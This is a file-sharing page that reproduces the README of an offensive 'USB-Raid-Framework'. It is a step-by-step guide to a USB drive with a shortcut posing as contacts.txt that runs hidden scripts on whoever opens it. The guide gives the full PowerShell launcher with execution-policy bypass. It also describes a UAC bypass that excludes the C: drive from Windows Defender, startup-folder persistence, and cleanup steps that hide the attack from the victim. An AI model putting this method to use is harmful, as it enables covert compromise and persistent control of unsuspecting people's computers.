文件列表:

LICENSE (1068, 2022-09-29)
contacts.txt.lnk (1545, 2022-09-29)
h (0, 2022-09-29)
h\contacts.txt (1138, 2022-09-29)
h\exception.ps1 (520, 2022-09-29)
h\initial.ps1 (4, 2022-09-29)
h\persist.cmd (100, 2022-09-29)
h\persist.ps1 (13, 2022-09-29)
s1.bat (475, 2022-09-29)

# USB-Raid-Framework 

Table of Contents

1. Description
2. Getting Started
3. Contributing
4. Version History
5. Contact
6. Acknowledgments

An offensive security framework that weaponizes any standard USB Device ## Description This framework is designed to be implemented on any standard USB Drive This attack takes advantage of the ability to run powershell commands from inside a .lnk file. The following video is another example of how this method may be implemented.

YouTube Tutorial

After downloading the .Zip file and placing the contents on your USB drive you'll want to delete the ReadMe.md and LICENSE file Next you will want to make sure the `h` directory and `s1.bat` file have the hidden attribute. You do not want these files to be visible to your target. Now in the Root directory you should have 3 files * A hidden `h` directory - Folder containing all the files needed to be moved onto your targets system, and the initial script to be run * A hidden `s1.bat` file - A bat file called on by the shortcut to move all the above files and execute the initial script * A `contacts.txt` .lnk file (shortcut) - a shortcut phishing file disguised as a text file to entice your target to open it The `h` directory will contain 5 more files * `contacts.txt` - the actual text file to be opened by the shortcut to convince your target they just opened a regular txt file * `exception.ps1` - A script containing a UAC bypass to open an admin window and add the targets C:/ drive to the windows defender exclusion list. This will prevent further tools you download from being flagged by defender * `intitial.ps1` - This is a script that will be ran one time when the target open the fake text file * `persist.cmd` - This is a file added to the start up folder to achieve persistence. It will call on the `persist.ps1` file stored in the AppData directory * `persist.ps1` - This is the file that will contain your script that will be run everytime the target boots up their computer ## Getting Started Taking advantage of a little known secret we will be running powershell code embedded in a shortcuts target field as seen in the image below. This has a few advantages. * You can't run a regular powershell script by double clicking on it. It will only open it with your default text editor. It will run from a shortcut * External powershell scripts can not be run without triggering the UAC prompt. We use the shortcut to open their own powershell console we run it from to trick their sytem into thinking it is from a native script. This is the code in that target text box: ```C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe -NoP -NonI -W H -ep bypass ".((gwmi win32_volume -f 'label=''259''').Name+'s1.bat')``` This code will open a powershell console and bypass the execution policy and run our bat file after identifying what drive letter our USB is. In order for it to find our drive we must change the label of our USB to match the label used in our code in the target text box. For this example notice the label in the image below and the code above are both `259`. This can be changed but they both need to match. ### Executing program Once you have all of the above set up you are ready to execute this attack vector You will want to have 2 payloads ready. * Your initial payload to be run once this attack has been initiated. I use my [ADV Recon](https://github.com/I-Am-Jakoby/hak5-submissions/tree/main/OMG/Payloads/OMG-ADV-Recon) payload to gather as much info on my target as possible * The payload you want to be run with persistence at each reboot on your targets PC (This payload will vary depending on your goal) Once this attack vector has been initiated by your target opening the fake text file link it will open the real hidden txt file in the `h` directory to avoid suspicion The shortcut will then run the `s1.bat` file that will initialize the rest of your scripts. First your initial payload will run followed by moving your `persistance.bat` file to the start up directory. Then your `persistence.ps1` file will be added to the AppData folder and run once now and again at each start up. Finally the real hidden text file will replace your fake txt shortcut link and delete the rest of the files to avoid further investigation into your USB drive In a real world scenario you would also want to make the USB drive look realistic with a photo album or something else to entice your target to get in contact with you by clicking on the fake contacts.txt file ### Dependencies * An internet connection * Windows 10,11

(back to top)

(back to top)

## Contributing All contributors names will be listed here I am Jakoby

(back to top)

## Version History * 0.1 * Initial Release

(back to top)

## Contact

“± My Socials “±

(back to top)

## Acknowledgments * [Hak5](https://hak5.org/) * [MG](https://github.com/OMG-MG)

(back to top)

近期下载者：

相关文件：

评论：[我要评论] [举报此文件]

收藏者：